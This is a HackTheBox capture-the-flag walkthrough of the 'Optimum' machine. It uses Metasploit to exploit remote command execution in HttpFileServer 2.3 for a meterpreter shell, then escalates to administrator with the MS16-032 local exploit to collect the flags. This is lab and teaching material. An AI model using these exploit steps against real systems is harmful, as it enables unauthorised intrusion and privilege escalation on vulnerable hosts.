Optimum
Optimum writeup by Thamizhiniyan C S
Greetings everyone,
In this write-up, we will tackle Optimum from HackTheBox.
Machine link: Optimum
Difficulty Level: Easy
Let's Begin 🙌
Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. Click Here to learn more about how to connect to VPN and access the boxes.
Once connected to the VPN service, click on "Join Machine" to access the machine's IP.
Upon joining the machine, you will be able to view the IP address of the target machine.
nmap -A -T4 <TARGET>
Ports | Services | Service Version |
---|---|---|
80 | HTTP | HttpFileServer httpd 2.3 |
I searched Google for ‘HttpFileServer httpd 2.3’ to find out more about it and found that it’s vulnerable to Remote Command Execution.
During the information gathering phase, we found that the service ‘HttpFileServer httpd 2.3’ is vulnerable to Remote Command Injection. Let’s try to exploit that using Metasploit. Start Metasploit using the command ‘msfconsole’. Search for exploits for the service ‘httpfileserver’ using the command ‘search httpfileserver’.
Select the exploit using the command ‘use 0’. Next, check the options for the exploit using the command ‘show options’. The required options that we need to modify are RHOSTS (target IP) and LHOST (attacker IP).
We can do that by using the following commands:
set rhosts <Target_IP>
set lhost <HTB_TUN_IP>
Now to perform the exploit, enter the command ‘exploit’ and press enter.
We have successfully exploited the target and got our initial access on the target machine.
Found the user flag in the Desktop Directory.
First I tried the ‘getsystem’ command which executes a ‘meterpreter’ script that tries to escalate privileges, but it failed.
Next I decided to look out for exploits to escalate privileges. For this I used another Metasploit module ‘local_exploit_suggester’. To use that first we have to put the current ‘meterpreter’ session to background using the command ‘background’.
Now select the Metasploit module using the command ‘use post/multi/recon/local_exploit_suggester’. Check the options the module requires to run. The only required option is SESSION (the id of the ‘meterpreter’ session that we put in the background).
We can find the session id using the ‘sessions’ command. Use the command ‘set session 1’ to refer to the required session.
We can run the module using the command ‘exploit’.
We can see five possible suggestions by ‘local_exploit_suggester’, out of which ‘exploit/windows/local/ms16_032_secondary_logon_handle_privesc’ worked. We can select this exploit using the command ‘use exploit/windows/local/ms16_032_secondary_logon_handle_privesc’. Check the options this exploit requires to run. The required options are SESSION (the id of the ‘meterpreter’ session that we put in the background) and LHOST (attacker IP).
We can do that by using the following commands:
set session 1
set lhost <HTB_TUN_IP>
Now execute the exploit using the command ‘exploit’.
We have successfully performed privilege escalation.
I searched for the root.txt using the search command in meterpreter.
Found the root flag at C:\Users\Administrator\Desktop\root.txt.
Thank You...